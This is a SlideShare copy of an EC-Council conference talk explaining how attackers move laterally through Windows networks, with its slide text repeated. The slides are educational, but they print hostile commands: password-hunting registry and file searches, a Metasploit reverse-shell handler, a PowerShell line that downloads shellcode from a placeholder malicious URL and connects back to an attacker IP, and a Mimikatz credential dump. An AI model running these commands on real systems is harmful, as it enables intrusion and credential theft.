SlideShare a Scribd company logo

Lateral Movement: How attackers quietly traverse your Network

EC-Council
EC-Council

After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.

1 of 24
Download to read offline
Lateral Movement How attackers quietly transverse your Networks
About Xavier • Currently VP of Drawbridge Networks • Hacking since the late 80s • First half my career was implementing Security • Second half career is security consulting, VARs, and Vendors • Georgia Institute Of Technology: Computer Engineering with International Affairs minor
Kill Chain is outdated Recon Weaponize Delivery Exploit Install C&C Action
Kill Chain, Updated Recon Weaponize Delivery Exploit Persistence Action Lateral Movement
What is Lateral Movement? Marketing PCSales PC Executive PCIT Laptop Domain Controller Web Server
Three Types of Recon • Passive Information Gathering • Semi-passive Information Gathering • Active Information Gathering
You’ve got remote shell, now what? • systeminfo | findstr /B /C:"OS Name" /C:"OS Version" • hostname • echo %username% • net users • net user <username> • echo %userdomain% • echo %userdnsdomain% • nslookup -querytype=SRV _LDAP._TCP.DC._MSDCS.<domain> • net start • ipconfig /all • route print • arp -A • netstat -ano • netsh firewall show state • netsh firewall show config • schtasks /query /fo LIST /v • tasklist /SVC • DRIVERQUERY
Find the Domain Controllers
Service Principal Names (SPNs) • Find SPNs linked to a certain computer setspn -L <ServerName> • Find SPNs linked to a certain user account setspn -L <domainuser> • Powershell Get-NetUser -SPN
Privilege Escalation • Look for missing patches, known exploits • Look in automated install answer files for passwords • Get saved passwords from Group Policy (metaploit or Get-GPPPaassword) • Look for registry setting "AlwaysInstallElevated“ • HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated • HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated • Hail Mary • dir /s *pass* == *cred* == *vnc* == *.config* • findstr /si password *.xml *.ini *.txt • reg query HKLM /f password /t REG_SZ /s • reg query HKCU /f password /t REG_SZ /s
Privilege Escalation - Advanced • Vulnerable Windows Services • DLL hijacking using vulnerable folders in the PATH • Replace executable with existing scheduled task.
Privilege Escalation – Hacking a Service
Or just run PowerUp (Invoke-AllChecks) • if you are an admin in a medium integrity process (exploitable with bypassuac) • for any unquoted service path issues • for any services with misconfigured ACLs (exploitable with service_*) • any improper permissions on service executables (exploitable with service_exe_*) • for any leftover unattend.xml files • if the AlwaysInstallElevated registry key is set • if any Autologon credentials are left in the registry • for any encrypted web.config strings and application pool passwords • for any %PATH% .DLL hijacking opportunities (exploitable with write_dllhijacker)
PowerShell There are a number of reasons why attackers love PowerShell: • Run code in memory without touching disk • Download & execute code from another system • Direct access to .NET & Win32 API • Built-in remoting • CMD.exe is commonly blocked, though not PowerShell • Most organizations are not watching PowerShell activity • Many endpoint security products don’t have visibility into PowerShell activity
PowerShell v5 Security Enhancements • Script block logging • System-wide transcripts • Constrained PowerShell enforced with AppLocker • The Anti-Malware Scan Interface (AMSI) • There are two primary methods of bypassing AMSI (at least for now): • Provide & use a custom amsi.dll and call that one from custom EXE. • Matt Graeber described how to use reflection to bypass AMSI
Remote Access with no hit to Disk Create Shellcode from Metasploit msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https msf exploit(handler) > set LHOST <Your local host> msf exploit(handler) > set LPORT 443 msf exploit(handler) > exploit Powershell Shellcode Injection IEX (New-Object Net.WebClient).DownloadString("https: //<Malicious URL>/Invoke- Shellcode.ps1") Invoke-ShellCode -Payload windows/meterpreter/reverse_https - Lhost <malicious IP> -Lport 443 - Force
PowerSploit • Invoke-DllInjection.ps1 • Invoke-Shellcode.ps1 • Invoke-WmiCommand.ps1 • Get-GPPPassword.ps1 • Get-Keystrokes.ps1 • Get-TimedScreenshot.ps1 • Get-VaultCredential.ps1 • Invoke-CredentialInjection.ps1 • Invoke-Mimikatz.ps1 • Invoke-NinjaCopy.ps1 • Invoke-TokenManipulation.ps1 • Out-Minidump.ps1 • VolumeShadowCopyTools.ps1 • Invoke-ReflectivePEInjection.ps1
Invoke-Mimikatz
No Domain Admins Yet? Invoke-Mimikatz –dumpcreds Out-File -Append c:evilplace$env:computername.txt
Other Ways to get Domain Admin • Passwords in SYSVOL & Group Policy Preferences • Exploit the MS14-068 Kerberos Vulnerability on a Domain Controller Missing the Patch • Kerberos TGS Service Ticket Offline Cracking (Kerberoast) • Gain Access to the Active Directory Database File (ntds.dit) • Compromise an account with rights to logon to a Domain Controller • Then run Mimicatz
PowerShell Empire Capabilities: • PowerShell based Remote Access Trojan (RAT). • Python server component (Kali Linux). • AES Encrypted C2 channel. • Dumps and tracks credentials in database.
Nishang • Check-VM • Remove-Update • Invoke-CredentialsPhish
PS>Attack Use for AV Bypass. Build tool for new encrypted exe every time. Contains • PowerTools • PowerUp • PowerView • Nishang • Powercat • Inveigh Powersploit: • Invoke-Mimikatz • Get-GPPPassword • Invoke-NinjaCopy • Invoke-Shellcode • Invoke-WMICommand • VolumeShadowCopyTools
References • SPNs: http://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax- setspn-exe.aspx • SPN Query: https://technet.microsoft.com/en-us/library/ee176972.aspx • Active Directory Security: https://adsecurity.org • Remote Access PowerShell with Metasploit http://www.redblue.team/2016/01/powershell-traceless-threat-and- how-to.html • No Domain Admin yet? https://365lab.net/tag/invoke-mimikatz/ • Privilege Escalation: http://www.fuzzysecurity.com/tutorials/16.html • PowerUp: http://www.powershellempire.com/?page_id=378 • PowerSploit: https://github.com/PowerShellMafia/PowerSploit • Mimikatz: https://github.com/gentilkiwi/mimikatz • PowerShell Empire: https://github.com/powershellempire/empire • Nishang: https://github.com/samratashok/nishang • PS>Attack: https://github.com/jaredhaight/psattack Contact me @XavierAshe

More Related Content

Lateral Movement: How attackers quietly traverse your Network

  • 1. Lateral Movement How attackers quietly transverse your Networks
  • 2. About Xavier • Currently VP of Drawbridge Networks • Hacking since the late 80s • First half my career was implementing Security • Second half career is security consulting, VARs, and Vendors • Georgia Institute Of Technology: Computer Engineering with International Affairs minor
  • 3. Kill Chain is outdated Recon Weaponize Delivery Exploit Install C&C Action
  • 5. What is Lateral Movement? Marketing PCSales PC Executive PCIT Laptop Domain Controller Web Server
  • 6. Three Types of Recon • Passive Information Gathering • Semi-passive Information Gathering • Active Information Gathering
  • 7. You’ve got remote shell, now what? • systeminfo | findstr /B /C:"OS Name" /C:"OS Version" • hostname • echo %username% • net users • net user <username> • echo %userdomain% • echo %userdnsdomain% • nslookup -querytype=SRV _LDAP._TCP.DC._MSDCS.<domain> • net start • ipconfig /all • route print • arp -A • netstat -ano • netsh firewall show state • netsh firewall show config • schtasks /query /fo LIST /v • tasklist /SVC • DRIVERQUERY
  • 8. Find the Domain Controllers
  • 9. Service Principal Names (SPNs) • Find SPNs linked to a certain computer setspn -L <ServerName> • Find SPNs linked to a certain user account setspn -L <domainuser> • Powershell Get-NetUser -SPN
  • 10. Privilege Escalation • Look for missing patches, known exploits • Look in automated install answer files for passwords • Get saved passwords from Group Policy (metaploit or Get-GPPPaassword) • Look for registry setting "AlwaysInstallElevated“ • HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated • HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated • Hail Mary • dir /s *pass* == *cred* == *vnc* == *.config* • findstr /si password *.xml *.ini *.txt • reg query HKLM /f password /t REG_SZ /s • reg query HKCU /f password /t REG_SZ /s
  • 11. Privilege Escalation - Advanced • Vulnerable Windows Services • DLL hijacking using vulnerable folders in the PATH • Replace executable with existing scheduled task.
  • 12. Privilege Escalation – Hacking a Service
  • 13. Or just run PowerUp (Invoke-AllChecks) • if you are an admin in a medium integrity process (exploitable with bypassuac) • for any unquoted service path issues • for any services with misconfigured ACLs (exploitable with service_*) • any improper permissions on service executables (exploitable with service_exe_*) • for any leftover unattend.xml files • if the AlwaysInstallElevated registry key is set • if any Autologon credentials are left in the registry • for any encrypted web.config strings and application pool passwords • for any %PATH% .DLL hijacking opportunities (exploitable with write_dllhijacker)
  • 14. PowerShell There are a number of reasons why attackers love PowerShell: • Run code in memory without touching disk • Download & execute code from another system • Direct access to .NET & Win32 API • Built-in remoting • CMD.exe is commonly blocked, though not PowerShell • Most organizations are not watching PowerShell activity • Many endpoint security products don’t have visibility into PowerShell activity
  • 15. PowerShell v5 Security Enhancements • Script block logging • System-wide transcripts • Constrained PowerShell enforced with AppLocker • The Anti-Malware Scan Interface (AMSI) • There are two primary methods of bypassing AMSI (at least for now): • Provide & use a custom amsi.dll and call that one from custom EXE. • Matt Graeber described how to use reflection to bypass AMSI
  • 16. Remote Access with no hit to Disk Create Shellcode from Metasploit msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https msf exploit(handler) > set LHOST <Your local host> msf exploit(handler) > set LPORT 443 msf exploit(handler) > exploit Powershell Shellcode Injection IEX (New-Object Net.WebClient).DownloadString("https: //<Malicious URL>/Invoke- Shellcode.ps1") Invoke-ShellCode -Payload windows/meterpreter/reverse_https - Lhost <malicious IP> -Lport 443 - Force
  • 17. PowerSploit • Invoke-DllInjection.ps1 • Invoke-Shellcode.ps1 • Invoke-WmiCommand.ps1 • Get-GPPPassword.ps1 • Get-Keystrokes.ps1 • Get-TimedScreenshot.ps1 • Get-VaultCredential.ps1 • Invoke-CredentialInjection.ps1 • Invoke-Mimikatz.ps1 • Invoke-NinjaCopy.ps1 • Invoke-TokenManipulation.ps1 • Out-Minidump.ps1 • VolumeShadowCopyTools.ps1 • Invoke-ReflectivePEInjection.ps1
  • 19. No Domain Admins Yet? Invoke-Mimikatz –dumpcreds Out-File -Append c:evilplace$env:computername.txt
  • 20. Other Ways to get Domain Admin • Passwords in SYSVOL & Group Policy Preferences • Exploit the MS14-068 Kerberos Vulnerability on a Domain Controller Missing the Patch • Kerberos TGS Service Ticket Offline Cracking (Kerberoast) • Gain Access to the Active Directory Database File (ntds.dit) • Compromise an account with rights to logon to a Domain Controller • Then run Mimicatz
  • 21. PowerShell Empire Capabilities: • PowerShell based Remote Access Trojan (RAT). • Python server component (Kali Linux). • AES Encrypted C2 channel. • Dumps and tracks credentials in database.
  • 23. PS>Attack Use for AV Bypass. Build tool for new encrypted exe every time. Contains • PowerTools • PowerUp • PowerView • Nishang • Powercat • Inveigh Powersploit: • Invoke-Mimikatz • Get-GPPPassword • Invoke-NinjaCopy • Invoke-Shellcode • Invoke-WMICommand • VolumeShadowCopyTools
  • 24. References • SPNs: http://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax- setspn-exe.aspx • SPN Query: https://technet.microsoft.com/en-us/library/ee176972.aspx • Active Directory Security: https://adsecurity.org • Remote Access PowerShell with Metasploit http://www.redblue.team/2016/01/powershell-traceless-threat-and- how-to.html • No Domain Admin yet? https://365lab.net/tag/invoke-mimikatz/ • Privilege Escalation: http://www.fuzzysecurity.com/tutorials/16.html • PowerUp: http://www.powershellempire.com/?page_id=378 • PowerSploit: https://github.com/PowerShellMafia/PowerSploit • Mimikatz: https://github.com/gentilkiwi/mimikatz • PowerShell Empire: https://github.com/powershellempire/empire • Nishang: https://github.com/samratashok/nishang • PS>Attack: https://github.com/jaredhaight/psattack Contact me @XavierAshe